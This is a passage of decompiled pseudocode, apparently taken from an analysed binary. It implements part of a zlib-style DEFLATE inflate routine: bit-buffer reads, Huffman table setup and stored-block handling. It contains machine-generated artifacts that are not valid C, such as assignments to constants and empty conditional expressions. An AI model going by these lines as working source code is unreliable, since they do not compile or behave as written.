                                                                                                                                                  									__ecx = __edi & 0x00000007;
                                                                                                                                                  									__edx = __edx >> __cl;
                                                                                                                                                  									__edi = __edi - __ecx;
                                                                                                                                                  									_v16 = __edx;
                                                                                                                                                  									_v20 = __edi;
                                                                                                                                                  									goto L142;
                                                                                                                                                  								case 0xd:
                                                                                                                                                  									__edi = __edi & 0x00000007;
                                                                                                                                                  									__edi = __edi - (__edi & 0x00000007);
                                                                                                                                                  									__edx = __edx >> __cl;
                                                                                                                                                  									_v16 = __edx;
                                                                                                                                                  									_v20 = __edi;
                                                                                                                                                  									__eflags = __edi - 0x20;
                                                                                                                                                  									if(__edi >= 0x20) {
                                                                                                                                                  										L177:
                                                                                                                                                  										__eax = __edx;
                                                                                                                                                  										__ecx = __edx;
                                                                                                                                                  										__eax =  !__edx;
                                                                                                                                                  										__ecx = __edx & 0x0000ffff;
                                                                                                                                                  										__eax =  !__edx >> 0x10;
                                                                                                                                                  										__eflags = __ecx -  !__edx >> 0x10;
                                                                                                                                                  										if(__ecx ==  !__edx >> 0x10) {
                                                                                                                                                  											__eax = 0;
                                                                                                                                                  											 *(__ebx + 0x40) = __ecx;
                                                                                                                                                  											__eflags = _a8 - 6;
                                                                                                                                                  											__edx = 0;
                                                                                                                                                  											__ecx = _v8;
                                                                                                                                                  											__edi = 0;
                                                                                                                                                  											_v16 = 0;
                                                                                                                                                  											_v20 = 0;
                                                                                                                                                  											 *__ebx = 0xe;
                                                                                                                                                  											if(_a8 == 6) {
                                                                                                                                                  												goto L332;
                                                                                                                                                  											}
                                                                                                                                                  											goto L180;
                                                                                                                                                  										}
                                                                                                                                                  										 *(__esi + 0x18) = "invalid stored block lengths";
                                                                                                                                                  										goto L25;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = _v12;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										__ecx = _v8;
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx == 0) {
                                                                                                                                                  											goto L332;
                                                                                                                                                  										}
                                                                                                                                                  										__eax =  *__eax & 0x000000ff;
                                                                                                                                                  										_v8 = __ecx;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__eax = __eax << __cl;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										__edx = __edx + __eax;
                                                                                                                                                  										_v20 = __edi;
                                                                                                                                                  										__eax = _v12;
                                                                                                                                                  										__eax = _v12 + 1;
                                                                                                                                                  										_v16 = __edx;
                                                                                                                                                  										_v12 = __eax;
                                                                                                                                                  										__eflags = __edi - 0x20;
                                                                                                                                                  										if(__edi < 0x20) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L177;
                                                                                                                                                  									}
                                                                                                                                                  									goto L332;
                                                                                                                                                  								case 0xe:
                                                                                                                                                  									L180:
                                                                                                                                                  									 *__ebx = 0xf;
                                                                                                                                                  									goto L181;
                                                                                                                                                  								case 0xf:
                                                                                                                                                  									L181:
                                                                                                                                                  									__eax =  *(__ebx + 0x40);
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax == 0) {
                                                                                                                                                  										 *__ebx = 0xb;
                                                                                                                                                  										goto L143;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = __eax - __ecx;
                                                                                                                                                  									__eax =  >  ? __ecx : __eax;
                                                                                                                                                  									__eflags = __eax - _v28;
                                                                                                                                                  									__eax =  >  ? _v28 : __eax;
                                                                                                                                                  									_v56 = __eax;
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax == 0) {
                                                                                                                                                  										goto L331;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = memcpy(_v32, _v12, __eax);
                                                                                                                                                  									__eax = _v56;
                                                                                                                                                  									__esp = __esp + 0xc;
                                                                                                                                                  									__ecx = _v8;
                                                                                                                                                  									_v12 = _v12 + __eax;
                                                                                                                                                  									__ecx = _v8 - __eax;
                                                                                                                                                  									_v28 = _v28 - __eax;
                                                                                                                                                  									_v32 = _v32 + __eax;
                                                                                                                                                  									 *(__ebx + 0x40) =  *(__ebx + 0x40) - __eax;
                                                                                                                                                  									__edx = _v16;
                                                                                                                                                  									_v8 = __ecx;
                                                                                                                                                  									goto L143;
                                                                                                                                                  								case 0x10:
                                                                                                                                                  									__eflags = __edi - 0xe;
                                                                                                                                                  									if(__edi >= 0xe) {
                                                                                                                                                  										L189:
                                                                                                                                                  										__eax = __edx;
                                                                                                                                                  										__edi = __edi - 0xe;
                                                                                                                                                  										__eax = __edx & 0x0000001f;
                                                                                                                                                  										__edx = __edx >> 5;
                                                                                                                                                  										__eax = __eax + 0x101;
                                                                                                                                                  										_v20 = __edi;
                                                                                                                                                  										 *(__ebx + 0x60) = __eax;
                                                                                                                                                  										__eax = __edx;
                                                                                                                                                  										__eax = __edx & 0x0000001f;
                                                                                                                                                  										__edx = __edx >> 5;
                                                                                                                                                  										 *(__ebx + 0x64) = __eax;
                                                                                                                                                  										__eax = __edx;
                                                                                                                                                  										__eax = __edx & 0x0000000f;
                                                                                                                                                  										__edx = __edx >> 4;
                                                                                                                                                  										__eax = __eax + 4;
                                                                                                                                                  										_v16 = __edx;
                                                                                                                                                  										__eflags =  *(__ebx + 0x60) - 0x11e;
                                                                                                                                                  										 *(__ebx + 0x5c) = __eax;
                                                                                                                                                  										if( *(__ebx + 0x60) > 0x11e) {
                                                                                                                                                  											L192:
                                                                                                                                                  											 *(__esi + 0x18) = "too many length or distance symbols";
                                                                                                                                                  											goto L39;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags =  *(__ebx + 0x64) - 0x1e;
                                                                                                                                                  										if( *(__ebx + 0x64) > 0x1e) {
                                                                                                                                                  											goto L192;
                                                                                                                                                  										}
                                                                                                                                                  										 *(__ebx + 0x68) =  *(__ebx + 0x68) & 0x00000000;
                                                                                                                                                  										_push(0x11);
                                                                                                                                                  										_pop(__eax);
                                                                                                                                                  										 *__ebx = __eax;
                                                                                                                                                  										goto L198;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = _v12;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                  										if(__ecx == 0) {
                                                                                                                                                  											goto L331;
                                                                                                                                                  										}
                                                                                                                                                  										__eax =  *__eax & 0x000000ff;
                                                                                                                                                  										_v8 = __ecx;
                                                                                                                                                  										__ecx = __edi;
                                                                                                                                                  										__eax = __eax << __cl;
                                                                                                                                                  										__edi = __edi + 8;
                                                                                                                                                  										__ecx = _v8;
                                                                                                                                                  										__edx = __edx + __eax;
                                                                                                                                                  										__eax = _v12;
                                                                                                                                                  										__eax = _v12 + 1;
                                                                                                                                                  										_v16 = __edx;
                                                                                                                                                  										_v12 = __eax;
                                                                                                                                                  										__eflags = __edi - 0xe;
                                                                                                                                                  										if(__edi < 0xe) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L189;
                                                                                                                                                  									}
                                                                                                                                                  									goto L331;
                                                                                                                                                  								case 0x11:
                                                                                                                                                  									while(1) {
                                                                                                                                                  										L198:
                                                                                                                                                  										__eax =  *(__ebx + 0x68);
                                                                                                                                                  										__eflags =  *(__ebx + 0x68) -  *(__ebx + 0x5c);
                                                                                                                                                  										if( *(__ebx + 0x68) >=  *(__ebx + 0x5c)) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = __edi - 3;
                                                                                                                                                  										if(__edi >= 3) {
                                                                                                                                                  											L197:
                                                                                                                                                  											__eax =  *(__ebx + 0x68);
                                                                                                                                                  											__edx = __edx & 0x00000007;
                                                                                                                                                  											__edx = __edx >> 3;
                                                                                                                                                  											_v16 = __edx;
                                                                                                                                                  											__eax =  *(0xd4908 +  *(__ebx + 0x68) * 2) & 0x0000ffff;
                                                                                                                                                  											 *((short*)(__ebx + 0x70 + ( *(0xd4908 +  *(__ebx + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
                                                                                                                                                  											 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                                                                  											__edi = __edi - 3;
                                                                                                                                                  											__eflags = __edi;
                                                                                                                                                  											__ecx = _v8;
                                                                                                                                                  											_v20 = __edi;
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										__eax = _v12;
                                                                                                                                                  										while(1) {
                                                                                                                                                  											__eflags = __ecx;
                                                                                                                                                  											if(__ecx == 0) {
                                                                                                                                                  												goto L331;
                                                                                                                                                  											}
                                                                                                                                                  											__eax =  *__eax & 0x000000ff;
                                                                                                                                                  											_v8 = __ecx;
                                                                                                                                                  											__ecx = __edi;
                                                                                                                                                  											__eax = __eax << __cl;
                                                                                                                                                  											__edi = __edi + 8;
                                                                                                                                                  											__ecx = _v8;
                                                                                                                                                  											__edx = __edx + __eax;
                                                                                                                                                  											__eax = _v12;
                                                                                                                                                  											__eax = _v12 + 1;
                                                                                                                                                  											_v16 = __edx;
                                                                                                                                                  											_v12 = __eax;
                                                                                                                                                  											__eflags = __edi - 3;
                                                                                                                                                  											if(__edi < 3) {
                                                                                                                                                  												continue;
                                                                                                                                                  											}
                                                                                                                                                  											goto L197;
                                                                                                                                                  										}
                                                                                                                                                  										goto L331;
                                                                                                                                                  									}
                                                                                                                                                  									while(1) {
                                                                                                                                                  										__eflags =  *(__ebx + 0x68) - 0x13;
                                                                                                                                                  										if( *(__ebx + 0x68) >= 0x13) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										__eax =  *(__ebx + 0x68);
                                                                                                                                                  										__ecx = 0;
                                                                                                                                                  										__eax =  *(0xd4908 +  *(__ebx + 0x68) * 2) & 0x0000ffff;
                                                                                                                                                  										 *((short*)(__ebx + 0x70 + ( *(0xd4908 +  *(__ebx + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
                                                                                                                                                  										_t389 = __ebx + 0x68;
                                                                                                                                                  										 *_t389 =  *(__ebx + 0x68) + 1;
                                                                                                                                                  										__eflags =  *_t389;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = __ebx + 0x530;
                                                                                                                                                  									__ecx = __ebx + 0x6c;
                                                                                                                                                  									 *(__ebx + 0x4c) = __eax;
                                                                                                                                                  									 *(__ebx + 0x6c) = __eax;
                                                                                                                                                  									__edx = __ebx + 0x54;
                                                                                                                                                  									__eax = __ebx + 0x2f0;
                                                                                                                                                  									 *(__ebx + 0x54) = 7;
                                                                                                                                                  									__eax = __ebx + 0x70;
                                                                                                                                                  									__eax = E000D33B4(0, __ebx + 0x70, 0x13, __ecx, __edx, __ebx + 0x2f0);
                                                                                                                                                  									_v36 = __eax;
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax == 0) {
                                                                                                                                                  										 *(__ebx + 0x68) =  *(__ebx + 0x68) & 0x00000000;
                                                                                                                                                  										 *__ebx = 0x12;
                                                                                                                                                  										goto L233;
                                                                                                                                                  									}
                                                                                                                                                  									 *(__esi + 0x18) = "invalid code lengths set";
                                                                                                                                                  									goto L204;
                                                                                                                                                  								case 0x12:
                                                                                                                                                  									while(1) {
                                                                                                                                                  										L233:
                                                                                                                                                  										 *(__ebx + 0x64) =  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                                                                  										__ecx =  *(__ebx + 0x68);
                                                                                                                                                  										_v48 = __ecx;
                                                                                                                                                  										__eflags = __ecx -  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                                                                  										if(__ecx <  *(__ebx + 0x64) +  *(__ebx + 0x60)) {
                                                                                                                                                  											goto L208;
                                                                                                                                                  										} else {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										while(1) {
                                                                                                                                                  											L208:
                                                                                                                                                  											__ecx =  *(__ebx + 0x54);
                                                                                                                                                  											__edx = 0;
                                                                                                                                                  											__eax =  *(__ebx + 0x4c);
                                                                                                                                                  											1 = 1 << __cl;
                                                                                                                                                  											__edx = (1 << __cl) - 1;
                                                                                                                                                  											__edx = (1 << __cl) - 0x00000001 & _v16;
                                                                                                                                                  											__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 & _v16) * 4);
                                                                                                                                                  											__eax = __eax >> 8;
                                                                                                                                                  											__ecx = __cl & 0x000000ff;
                                                                                                                                                  											_v56 = __eax;
                                                                                                                                                  											__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                                                                  											if((__cl & 0x000000ff) <= __edi) {
                                                                                                                                                  												break;
                                                                                                                                                  											}
                                                                                                                                                  											__ecx = _v8;
                                                                                                                                                  											__eflags = __ecx;
                                                                                                                                                  											if(__ecx == 0) {
                                                                                                                                                  												goto L332;
                                                                                                                                                  											}
                                                                                                                                                  											__edx = _v12;
                                                                                                                                                  											_v8 = __ecx;
                                                                                                                                                  											__ecx = __edi;
                                                                                                                                                  											 *__edx & 0x000000ff = ( *__edx & 0x000000ff) << __cl;
                                                                                                                                                  											_v16 = _v16 + (( *__edx & 0x000000ff) << __cl);
                                                                                                                                                  											_v12 = __edx;
                                                                                                                                                  											__edi = __edi + 8;
                                                                                                                                                  											__eflags = __edi;
                                                                                                                                                  										}
                                                                                                                                                  										__edx = __eax;
                                                                                                                                                  										_push(0x10);
                                                                                                                                                  										__edx = __eax >> 0x10;
                                                                                                                                                  										_pop(__ecx);
                                                                                                                                                  										__eflags = __dx - __cx;
                                                                                                                                                  										if(__eflags >= 0) {
                                                                                                                                                  											if(__eflags != 0) {
                                                                                                                                                  												__edx = _v16;
                                                                                                                                                  												_push(0x11);
                                                                                                                                                  												_pop(__ecx);
                                                                                                                                                  												__eflags = _v54 - __cx;
                                                                                                                                                  												__ecx = __ah & 0x000000ff;
                                                                                                                                                  												if(_v54 != __cx) {
                                                                                                                                                  													_v20 = __ecx;
                                                                                                                                                  													while(1) {
                                                                                                                                                  														_t453 = __ecx + 7; // 0x18
                                                                                                                                                  														__eax = _t453;
                                                                                                                                                  														__eflags = __edi - _t453;
                                                                                                                                                  														if(__edi >= _t453) {
                                                                                                                                                  															break;
                                                                                                                                                  														}
                                                                                                                                                  														__ecx = _v8;
                                                                                                                                                  														__eflags = __ecx;
                                                                                                                                                  														if(__ecx == 0) {
                                                                                                                                                  															goto L332;
                                                                                                                                                  														}
                                                                                                                                                  														__eax = _v12;
                                                                                                                                                  														_v8 = __ecx;
                                                                                                                                                  														__ecx = __edi;
                                                                                                                                                  														 *_v12 & 0x000000ff = ( *_v12 & 0x000000ff) << __cl;
                                                                                                                                                  														__ecx = _v20;
                                                                                                                                                  														__edx = __edx + (( *_v12 & 0x000000ff) << __cl);
                                                                                                                                                  														_v12 = _v12 + 1;
                                                                                                                                                  														__edi = __edi + 8;
                                                                                                                                                  														_v16 = __edx;
                                                                                                                                                  													}
                                                                                                                                                  													__edx = __edx >> __cl;
                                                                                                                                                  													__ecx = __edx;
                                                                                                                                                  													__edx = __edx >> 7;
                                                                                                                                                  													__ecx = __ecx & 0x0000007f;
                                                                                                                                                  													_push(0xfffffff9);
                                                                                                                                                  													_pop(__eax);
                                                                                                                                                  													__ecx = __ecx + 0xb;
                                                                                                                                                  													__eax = __eax - _v20;
                                                                                                                                                  													__eflags = __eax;
                                                                                                                                                  													L228:
                                                                                                                                                  													_v56 = _v56 & 0x00000000;
                                                                                                                                                  													__edi = __edi + __eax;
                                                                                                                                                  													__eflags = __edi;
                                                                                                                                                  													L229:
                                                                                                                                                  													 *(__ebx + 0x64) =  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                                                                  													_v52 = __ecx;
                                                                                                                                                  													__ecx = __ecx + _v48;
                                                                                                                                                  													_v16 = __edx;
                                                                                                                                                  													_v20 = __edi;
                                                                                                                                                  													__eflags = __ecx -  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                                                                  													if(__ecx >  *(__ebx + 0x64) +  *(__ebx + 0x60)) {
                                                                                                                                                  														 *(__esi + 0x18) = "invalid bit length repeat";
                                                                                                                                                  														 *__ebx = 0x1d;
                                                                                                                                                  														L237:
                                                                                                                                                  														__eflags =  *__ebx - 0x1d;
                                                                                                                                                  														if( *__ebx == 0x1d) {
                                                                                                                                                  															L141:
                                                                                                                                                  															__edx = _v16;
                                                                                                                                                  															goto L142;
                                                                                                                                                  														}
                                                                                                                                                  														__eax = 0;
                                                                                                                                                  														__eflags =  *((intOrPtr*)(__ebx + 0x270)) - __ax;
                                                                                                                                                  														if( *((intOrPtr*)(__ebx + 0x270)) != __ax) {
                                                                                                                                                  															__eax = __ebx + 0x530;
                                                                                                                                                  															__ecx = __ebx + 0x6c;
                                                                                                                                                  															 *(__ebx + 0x4c) = __eax;
                                                                                                                                                  															 *(__ebx + 0x6c) = __eax;
                                                                                                                                                  															__edx = __ebx + 0x54;
                                                                                                                                                  															__eax = __ebx + 0x2f0;
                                                                                                                                                  															 *(__ebx + 0x54) = 9;
                                                                                                                                                  															__eax = __ebx + 0x70;
                                                                                                                                                  															__eax = E000D33B4(1, __ebx + 0x70,  *(__ebx + 0x60), __ecx, __edx, __ebx + 0x2f0);
                                                                                                                                                  															_v36 = __eax;
                                                                                                                                                  															__eflags = __eax;
                                                                                                                                                  															if(__eax == 0) {
                                                                                                                                                  																__ecx = __ebx + 0x6c;
                                                                                                                                                  																__eax =  *__ecx;
                                                                                                                                                  																__edx = __ebx + 0x58;
                                                                                                                                                  																 *(__ebx + 0x50) =  *__ecx;
                                                                                                                                                  																__ebx + 0x2f0 =  *(__ebx + 0x60);
                                                                                                                                                  																__eax =  *(__ebx + 0x60) + 0x38;
                                                                                                                                                  																 *(__ebx + 0x58) = 6;
                                                                                                                                                  																__eax = __ebx + ( *(__ebx + 0x60) + 0x38) * 2;
                                                                                                                                                  																__eax = E000D33B4(2, __ebx + ( *(__ebx + 0x60) + 0x38) * 2,  *(__ebx + 0x64), __ecx, __edx, __ebx + 0x2f0);
                                                                                                                                                  																_v36 = __eax;
                                                                                                                                                  																__eflags = __eax;
                                                                                                                                                  																if(__eax == 0) {
                                                                                                                                                  																	__eflags = _a8 - 6;
                                                                                                                                                  																	__ecx = _v8;
                                                                                                                                                  																	 *__ebx = 0x13;
                                                                                                                                                  																	if(_a8 == 6) {
                                                                                                                                                  																		goto L332;
                                                                                                                                                  																	}
                                                                                                                                                  																	__edx = _v16;
                                                                                                                                                  																	goto L246;
                                                                                                                                                  																}
                                                                                                                                                  																 *(__esi + 0x18) = "invalid distances set";
                                                                                                                                                  																L204:
                                                                                                                                                  																 *__ebx = 0x1d;
                                                                                                                                                  																goto L141;
                                                                                                                                                  															}
                                                                                                                                                  															 *(__esi + 0x18) = "invalid literal/lengths set";
                                                                                                                                                  															goto L204;
                                                                                                                                                  														}
                                                                                                                                                  														 *(__esi + 0x18) = "invalid code -- missing end-of-block";
                                                                                                                                                  														goto L204;
                                                                                                                                                  													}
                                                                                                                                                  													__ecx = _v52;
                                                                                                                                                  													__eflags = __ecx;
                                                                                                                                                  													if(__ecx == 0) {
                                                                                                                                                  														continue;
                                                                                                                                                  													}
                                                                                                                                                  													__edx = _v56;
                                                                                                                                                  													do {
                                                                                                                                                  														__eax =  *(__ebx + 0x68);
                                                                                                                                                  														 *((short*)(__ebx + 0x70 +  *(__ebx + 0x68) * 2)) = __dx;
                                                                                                                                                  														 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                                                                  														__ecx = __ecx - 1;
                                                                                                                                                  														__eflags = __ecx;
                                                                                                                                                  													} while (__ecx != 0);
                                                                                                                                                  													continue;
                                                                                                                                                  												}
                                                                                                                                                  												_v20 = __ecx;
                                                                                                                                                  												while(1) {
                                                                                                                                                  													_t443 = __ecx + 3; // 0x14
                                                                                                                                                  													__eax = _t443;
                                                                                                                                                  													__eflags = __edi - _t443;
                                                                                                                                                  													if(__edi >= _t443) {
                                                                                                                                                  														break;
                                                                                                                                                  													}
                                                                                                                                                  													__ecx = _v8;
                                                                                                                                                  													__eflags = __ecx;
                                                                                                                                                  													if(__ecx == 0) {
                                                                                                                                                  														goto L332;
                                                                                                                                                  													}
                                                                                                                                                  													__eax = _v12;
                                                                                                                                                  													_v8 = __ecx;
                                                                                                                                                  													__ecx = __edi;
                                                                                                                                                  													 *_v12 & 0x000000ff = ( *_v12 & 0x000000ff) << __cl;
                                                                                                                                                  													__ecx = _v20;
                                                                                                                                                  													__edx = __edx + (( *_v12 & 0x000000ff) << __cl);
                                                                                                                                                  													_v12 = _v12 + 1;
                                                                                                                                                  													__edi = __edi + 8;
                                                                                                                                                  													_v16 = __edx;
                                                                                                                                                  												}
                                                                                                                                                  												__edx = __edx >> __cl;
                                                                                                                                                  												__ecx = __edx;
                                                                                                                                                  												__edx = __edx >> 3;
                                                                                                                                                  												__ecx = __ecx & 0x00000007;
                                                                                                                                                  												_push(0xfffffffd);
                                                                                                                                                  												_pop(__eax);
                                                                                                                                                  												__ecx = __ecx + 3;
                                                                                                                                                  												__eax = __eax - _v20;
                                                                                                                                                  												goto L228;
                                                                                                                                                  											}
                                                                                                                                                  											__eax = __eax >> 8;
                                                                                                                                                  											__ecx = __cl & 0x000000ff;
                                                                                                                                                  											__ecx = (__cl & 0x000000ff) + 2;
                                                                                                                                                  											_v56 = __ecx;
                                                                                                                                                  											__eflags = __edi - __ecx;
                                                                                                                                                  											if(__edi >= __ecx) {
                                                                                                                                                  												L215:
                                                                                                                                                  												__edx = _v16;
                                                                                                                                                  												__ecx = __ah & 0x000000ff;
                                                                                                                                                  												__eax = _v48;
                                                                                                                                                  												__edi = __edi - __ecx;
                                                                                                                                                  												__edx = _v16 >> __cl;
                                                                                                                                                  												_v16 = __edx;
                                                                                                                                                  												_v20 = __edi;
                                                                                                                                                  												__eflags = __eax;
                                                                                                                                                  												if(__eax == 0) {
                                                                                                                                                  													 *(__esi + 0x18) = "invalid bit length repeat";
                                                                                                                                                  													goto L25;
                                                                                                                                                  												}
                                                                                                                                                  												__eax =  *(__ebx + 0x6e + __eax * 2) & 0x0000ffff;
                                                                                                                                                  												__ecx = __edx;
                                                                                                                                                  												__ecx = __edx & 0x00000003;
                                                                                                                                                  												__edx = __edx >> 2;
                                                                                                                                                  												__ecx = __ecx + 3;
                                                                                                                                                  												_v56 = __eax;
                                                                                                                                                  												__edi = __edi - 2;
                                                                                                                                                  												goto L229;
                                                                                                                                                  											} else {
                                                                                                                                                  												goto L213;
                                                                                                                                                  											}
                                                                                                                                                  											while(1) {
                                                                                                                                                  												L213:
                                                                                                                                                  												__ecx = _v8;
                                                                                                                                                  												__eflags = __ecx;
                                                                                                                                                  												if(__ecx == 0) {
                                                                                                                                                  													goto L332;
                                                                                                                                                  												}
                                                                                                                                                  												_v8 = __ecx;
                                                                                                                                                  												__ecx = _v12;
                                                                                                                                                  												__edx =  *_v12 & 0x000000ff;
                                                                                                                                                  												__ecx = __edi;
                                                                                                                                                  												__edx = ( *_v12 & 0x000000ff) << __cl;
                                                                                                                                                  												__edi = __edi + 8;
                                                                                                                                                  												_v16 = _v16 + (( *_v12 & 0x000000ff) << __cl);
                                                                                                                                                  												_v12 = _v12 + 1;
                                                                                                                                                  												__eflags = __edi - _v56;
                                                                                                                                                  												if(__edi < _v56) {
                                                                                                                                                  													continue;
                                                                                                                                                  												}
                                                                                                                                                  												goto L215;
                                                                                                                                                  											}
                                                                                                                                                  											goto L332;
                                                                                                                                                  										}
                                                                                                                                                  										__eax = __eax >> 8;
                                                                                                                                                  										__ecx = __al & 0x000000ff;
                                                                                                                                                  										__eax = _v48;
                                                                                                                                                  										__edi = __edi - (__al & 0x000000ff);
                                                                                                                                                  										_v16 = _v16 >> __cl;
                                                                                                                                                  										_v20 = __edi;
                                                                                                                                                  										 *((short*)(__ebx + 0x70 + _v48 * 2)) = __dx;
                                                                                                                                                  										 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                                                                  									}
                                                                                                                                                  									goto L237;
                                                                                                                                                  								case 0x13:
                                                                                                                                                  									L246:
                                                                                                                                                  									 *__ebx = 0x14;
                                                                                                                                                  									goto L247;
                                                                                                                                                  								case 0x14:
                                                                                                                                                  									L247:
                                                                                                                                                  									__eflags = __ecx - 6;
                                                                                                                                                  									if(__ecx < 6) {
                                                                                                                                                  										L251:
                                                                                                                                                  										__eax =  *(__ebx + 0x4c);
                                                                                                                                                  										__ecx =  *(__ebx + 0x54);
                                                                                                                                                  										 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) & 0x00000000;
                                                                                                                                                  										_v52 =  *(__ebx + 0x4c);
                                                                                                                                                  										0 = 1;
                                                                                                                                                  										__eax = 1 << __cl;
                                                                                                                                                  										__ecx =  *(__ebx + 0x4c);
                                                                                                                                                  										__eax = (1 << __cl) - 1;
                                                                                                                                                  										__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                                                                  										__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 & __edx) * 4);
                                                                                                                                                  										while(1) {
                                                                                                                                                  											__eax = __eax >> 8;
                                                                                                                                                  											__ecx = __cl & 0x000000ff;
                                                                                                                                                  											__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                                                                  											if((__cl & 0x000000ff) <= __edi) {
                                                                                                                                                  												break;
                                                                                                                                                  											}
                                                                                                                                                  											__ecx = _v8;
                                                                                                                                                  											__eflags = __ecx;
                                                                                                                                                  											if(__ecx == 0) {
                                                                                                                                                  												goto L332;
                                                                                                                                                  											}
                                                                                                                                                  											__eax = _v12;
                                                                                                                                                  											_v8 = __ecx;
                                                                                                                                                  											__ecx = __edi;
                                                                                                                                                  											__edi = __edi + 8;
                                                                                                                                                  											_v20 = __edi;
                                                                                                                                                  											 *_v12 & 0x000000ff = ( *_v12 & 0x000000ff) << __cl;
                                                                                                                                                  											__ecx =  *(__ebx + 0x54);
                                                                                                                                                  											__edx = __edx + (( *_v12 & 0x000000ff) << __cl);
                                                                                                                                                  											_v12 = _v12 + 1;
                                                                                                                                                  											__eax =  *(__ebx + 0x4c);
                                                                                                                                                  											_v16 = __edx;
                                                                                                                                                  											0 = 1;
                                                                                                                                                  											1 << __cl = (1 << __cl) - 1;
                                                                                                                                                  											__edx = (1 << __cl) - 0x00000001 & _v16;
                                                                                                                                                  											__eflags = 1;
                                                                                                                                                  											__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 & _v16) * 4);
                                                                                                                                                  											__edx = _v16;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = __al;
                                                                                                                                                  										if(__al == 0) {
                                                                                                                                                  											L261:
                                                                                                                                                  											__eax = __eax >> 8;
                                                                                                                                                  											__ecx = __cl & 0x000000ff;
                                                                                                                                                  											 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                                                                  											__edi = __edi - __ecx;
                                                                                                                                                  											__edx = __edx >> __cl;
                                                                                                                                                  											__ecx = __eax;
                                                                                                                                                  											__ecx = __eax >> 0x10;
                                                                                                                                                  											_v16 = __edx;
                                                                                                                                                  											_v20 = __edi;
                                                                                                                                                  											 *(__ebx + 0x40) = __ecx;
                                                                                                                                                  											__eflags = __al;
                                                                                                                                                  											if(__al != 0) {
                                                                                                                                                  												__eflags = __al & 0x00000020;
                                                                                                                                                  												if((__al & 0x00000020) == 0) {
                                                                                                                                                  													__ecx = _v8;
                                                                                                                                                  													__eflags = __al & 0x00000040;
                                                                                                                                                  													if((__al & 0x00000040) == 0) {
                                                                                                                                                  														__eax = __al & 0x000000ff;
                                                                                                                                                  														__eax = __al & 0xf;
                                                                                                                                                  														__eflags = __eax;
                                                                                                                                                  														 *__ebx = 0x15;
                                                                                                                                                  														 *(__ebx + 0x48) = __eax;
                                                                                                                                                  														goto L268;
                                                                                                                                                  													}
                                                                                                                                                  													 *(__esi + 0x18) = "invalid literal/length code";
                                                                                                                                                  													L39:
                                                                                                                                                  													 *__ebx = 0x1d;
                                                                                                                                                  													goto L143;
                                                                                                                                                  												}
                                                                                                                                                  												 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) | 0xffffffff;
                                                                                                                                                  												 *__ebx = 0xb;
                                                                                                                                                  												goto L142;
                                                                                                                                                  											}
                                                                                                                                                  											 *__ebx = 0x19;
                                                                                                                                                  											goto L142;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = __al & 0x000000f0;
                                                                                                                                                  										if((__al & 0x000000f0) != 0) {
                                                                                                                                                  											goto L261;
                                                                                                                                                  										}
                                                                                                                                                  										__edi = 0;
                                                                                                                                                  										__ecx = __al & 0x000000ff;
                                                                                                                                                  										__ebx = __eax;
                                                                                                                                                  										__edi = 1;
                                                                                                                                                  										__ebx = __eax >> 8;
                                                                                                                                                  										__edx = __eax;
                                                                                                                                                  										__esi = __bl & 0x000000ff;
                                                                                                                                                  										__ecx = (__al & 0x000000ff) + __esi;
                                                                                                                                                  										__eax = __eax >> 0x10;
                                                                                                                                                  										__edi = 1 << __cl;
                                                                                                                                                  										__ecx = __esi;
                                                                                                                                                  										__edi = (1 << __cl) - 1;
                                                                                                                                                  										_v56 = __edx;
                                                                                                                                                  										(1 << __cl) - 0x00000001 & _v16 = ((1 << __cl) - 0x00000001 & _v16) >> __cl;
                                                                                                                                                  										__ecx = _v52;
                                                                                                                                                  										__edi = (((1 << __cl) - 0x00000001 & _v16) >> __cl) + __eax;
                                                                                                                                                  										__eax =  *((intOrPtr*)(_v52 + ((((1 << __cl) - 0x00000001 & _v16) >> __cl) + __eax) * 4));
                                                                                                                                                  										__ecx = __eax;
                                                                                                                                                  										__edi = _v20;
                                                                                                                                                  										__ecx = __eax >> 8;
                                                                                                                                                  										__esi = __cl & 0x000000ff;
                                                                                                                                                  										__ecx = __bl & 0x000000ff;
                                                                                                                                                  										__ebx = _v40;
